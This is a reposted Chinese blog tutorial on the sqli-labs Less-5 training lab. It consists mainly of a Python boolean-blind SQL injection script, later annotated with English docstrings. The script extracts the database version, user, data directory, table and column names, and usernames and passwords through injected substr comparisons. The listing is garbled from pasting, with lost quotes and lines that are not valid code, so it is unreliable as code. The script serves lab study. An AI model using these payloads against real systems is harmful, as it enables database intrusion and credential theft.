
sqli-labs:5-,基于报错的注入


 

 

思考1:当# --+都被过滤时,只能考虑闭合处理

思考2:union 联合注入前必须先判断字段数(列数)

e.g. id=1' order by 3 and '1'='1

 

sqli5:

首先判断出 id 参数经过了单引号(')处理

其次发现结果不再回显

OK,那就盲注了:先判断 MySQL 版本,版本过低时可优先考虑 DNS 边信道攻击。

bool盲注的脚本

  1 # -*- coding: utf-8 -*-
  2 """
  3 Created on Sat Mar 23 16:03:43 2019
  4 
  5 @author: kenshin
  6 """
  7 
  8 import requests,re
  9 url = http://localhost/sqli-labs/Less-5/?id=1  # lab target; every helper below appends its payload straight onto this string (the string quotes appear to have been lost when the listing was pasted)
 10 pattern_mark = You are in...........  # substring of the "true" page; its presence in r.text is the boolean oracle. It is passed to re.findall, so the dots are regex wildcards, not literal periods
 11 
 12 def get_version(url):
        """Recover the MySQL server version digit by digit through the boolean oracle.

        Expected shape is x.x.xx: slots 1 and 3 of lst are set to '.' directly and
        positions 1, 3, 5 and 6 of version() are probed. For each position every ASCII
        code 48..57 ('0'..'9') is sent as an ascii(substr(...))=N comparison appended
        to url; the first response in which pattern_mark is found fixes that digit.
        The result is only printed, nothing is returned, and a failed HTTP request
        propagates from requests.get.

        Defender view: the probe is one request per (position, candidate) pair to the
        same endpoint, differing only in the appended comparison -- the kind of burst
        that per-client rate limits and `ascii(substr(` / `--+` request signatures flag.

        NOTE(review): lst holds 5 slots (indices 0-4) but position 6 writes lst[5], which
        raises IndexError whenever a digit matches there; range(0, 6) looks intended.
        "lstsion" in the comment and the print is presumably a leftover of renaming the
        variable `version` to `lst`.
        """
 13     #MySQL version format: x.x.xx
 14     #assume the version string is 5 characters long
 15     lst = [# for x in range(0, 5)]
 16     lst[1] = lst[3] = .
 17     for i in (1,3,5,6):
 18         for ii in range(48,58):
 19             payload = "\‘ and ascii(substr((select version()),"+str(i)+",1))="+str(ii)+" --+"
 20             url_new = url + payload
 21             r = requests.get(url_new)  # no timeout: an unresponsive server blocks here indefinitely
 22             if(re.findall(pattern_mark,r.text)):
 23                 lst[i-1] = str(ii-48)  # ii is the ASCII code, ii-48 the digit itself
 24                 break
 25     sr = ‘‘.join(lst)  # the ‘‘ is the paste's rendering of '' (empty separator)
 26     print("the lstsion of mysql:"+sr)
 27 
 28 def get_user(url):
        """Recover the result of MySQL user() character by character (at most 15).

        For each position 1..15 the candidates on the `for ii in ...` line are tried in
        order; the first whose response contains pattern_mark is stored and echoed with
        print(ii). A position with no match keeps the placeholder from the list
        initializer (it reads as a bare `#` here -- the string quotes seem to have been
        lost when the listing was pasted, as for the candidate set itself). The assembled
        string is printed; nothing is returned.
        """
 29     #assume user() is 15 characters long
 30     lst = [# for x in range(0,15)]
 31     for i in range(1,16):
 32         for ii in qwertyuiopasdfghjklzxcvbnm1234567890_-@:
 33             payload = "\‘ and substr((select user()),"+str(i)+",1)=‘"+ii+"‘ --+"
 34             url_new = url + payload
 35             r = requests.get(url_new)  # no timeout: an unresponsive server blocks here indefinitely
 36             if(re.findall(pattern_mark,r.text)):
 37                 lst[i-1] = ii
 38                 print(ii)
 39                 break
 40     sr = ‘‘.join(lst)
 41     print("the user of database: "+sr)
 42     
 43 def get_datadir(url):
        """Recover the server's @@datadir value character by character (at most 32).

        Same probe loop as get_user: one request per (position, candidate), the first
        candidate whose response contains pattern_mark is kept and echoed. The candidate
        set here additionally starts with ':' and a backslash. Positions with no match
        keep the list placeholder. The result is printed, not returned.
        """
 44     #assume @@datadir is 32 characters long
 45     lst = [# for x in range(0,32)]
 46     for i in range(1,33):
 47         for ii in :\\qwertyuiopasdfghjklzxcvbnm1234567890_-:
 48             payload = "\‘ and substr((select @@datadir),"+str(i)+",1)=‘"+ii+"‘ --+"
 49             url_new = url + payload
 50             r = requests.get(url_new)  # no timeout: an unresponsive server blocks here indefinitely
 51             if(re.findall(pattern_mark,r.text)):
 52                 lst[i-1] = ii
 53                 print(ii)
 54                 break
 55     sr = ‘‘.join(lst)
 56     print(sr)
 57     
 58 def get_currTB(url):
        """Enumerate table names of the current database, one per outer iteration.

        Outer loop i selects row i of information_schema.tables for database() via
        `limit i,1`; the inner loops rebuild that name up to 10 characters from the
        candidate set. When position ii still holds its placeholder after all candidates
        (no match, i.e. the name is shorter) the inner loop stops and the partial name
        is printed. Up to 10 tables are tried; nothing is returned.

        NOTE(review): this subquery is `select *`, whereas get_Column selects exactly one
        column; a scalar subquery inside substr() takes a single column, so the two
        helpers are inconsistent -- confirm which form the lab accepts. The placeholder
        and the end-of-name check read as a bare `#` here (quotes lost in the paste),
        which also makes the `#` closing the candidate set look like a comment marker.
        """
 59     #assume the current database has at most 10 tables [indexed by i]
 60     for i in range(0,10):
 61         #assume the longest table name is 10 characters [indexed by ii]
 62         lst = [# for x in range(0,10)]
 63         for ii in range(1,11):
 64             for iii in qwertyuiopasdfghjklzxcvbnm1234567890_-#:
 65                 payload = "\‘ and substr((select * from information_schema.tables where table_schema=database() limit "+str(i)+",1),"+str(ii)+",1)=‘"+str(iii)+"‘ --+"
 66                 url_new = url + payload
 67                 r = requests.get(url_new)  # no timeout: an unresponsive server blocks here indefinitely
 68                 if(re.findall(pattern_mark,r.text)):
 69                     lst[ii-1] = iii
 70                     print(iii)
 71                     break
 72             if(lst[ii-1] == #):
 73                break
 74         sr = ‘‘.join(lst)
 75         print(sr)
 76 
 77 def get_Column(url,tb):
        """Enumerate column names of table `tb`, one per outer iteration (at most 3).

        `tb` is spliced directly into the payload string (the top-level code reads it
        from input()). Same probe loop as get_currTB: row i of information_schema.columns
        for that table_name is rebuilt up to 10 characters, stopping early when a
        position keeps its placeholder. Each name is printed; nothing is returned.
        The candidate set here starts with '@'.
        """
 78     #assume the table has at most 3 columns [indexed by i]
 79     for i in range(0,3):
 80         #assume each column name is at most 10 characters long
 81         lst = [# for x in range(0,10)]
 82         for ii in range(1,11):
 83             for iii in @qwertyuiopasdfghjklzxcvbnm1234567890_-#:
 84                 payload = "\‘ and substr((select column_name from information_schema.columns where table_name=‘"+tb+"‘ limit "+str(i)+",1),"+str(ii)+",1)=‘"+str(iii)+"‘ --+"
 85                 url_new = url + payload
 86                 r = requests.get(url_new)  # no timeout: an unresponsive server blocks here indefinitely
 87                 if(re.findall(pattern_mark,r.text)):
 88                     lst[ii-1] = iii
 89                     print(iii)
 90                     break
 91             if(lst[ii-1] == #):
 92                break
 93         sr = ‘‘.join(lst)
 94         print(sr)
 95 def get_data(url):
        """Read rows of the lab's security.users table (id, username, password) via the oracle.

        For id 1..10 the payload asks for group_concat(id,'%',username,'%',password) of
        that row and rebuilds it up to 25 characters from the candidate set (which starts
        with '%' so the separators are recoverable). A position that keeps its
        placeholder ends that row, and the partial row is printed. Table, columns and
        separator are hard-coded rather than passed in, as the author's comment below
        says. Nothing is returned.

        Style: the payload prefix here is the bare quote, whereas every other helper
        writes `\‘`; presumably both were the same apostrophe inside a double-quoted
        Python string before the paste, so this is a consistency nit only.
        """
 96     #assume the table has 10 rows [indexed by i]
 97     for i in range(1,11):
 98         #assume each row's concatenated data is at most 25 characters long
 99         lst = [# for x in range(0,25)]
100         for ii in range(1,26):
101             for iii in %@qwertyuiopasdfghjklzxcvbnm1234567890_-#:
102             #too many variables -- some payload parameters are set directly in the code TT
103                 payload = "‘ and substr((select group_concat(id,‘%‘,username,‘%‘,password) from security.users where id="+str(i)+"),"+str(ii)+",1)=‘"+str(iii)+"‘ --+"
104                 url_new = url + payload
105                 r = requests.get(url_new)  # no timeout: an unresponsive server blocks here indefinitely
106                 if(re.findall(pattern_mark,r.text)):
107                     lst[ii-1] = iii
108                     print(iii)
109                     break
110             if(lst[ii-1] == #):
111                break
112         sr = ‘‘.join(lst)
113         print(sr)
114 """
115 dnslog
116 """
117 
118 
    # Entry points. Importing or running the file as-is executes only the row dump at
    # the bottom; the other probes are enabled by uncommenting them, in the listed
    # order (version, user, datadir, table names, then column names for a table typed
    # at the prompt).
119 #get_version(url)  # the original read get_lstsion(url), a leftover of the version->lst rename; only get_version is defined
120 #get_user(url)
121 #get_datadir(url)
122 #get_currTB(url)
123 #tb = input("select table >> ")
124 #get_Column(url,tb)
125 get_data(url)
bool型盲注脚本


 

sqli-labs:5-,基于报错的注入

原文:https://www.cnblogs.com/p0pl4r/p/10584953.html
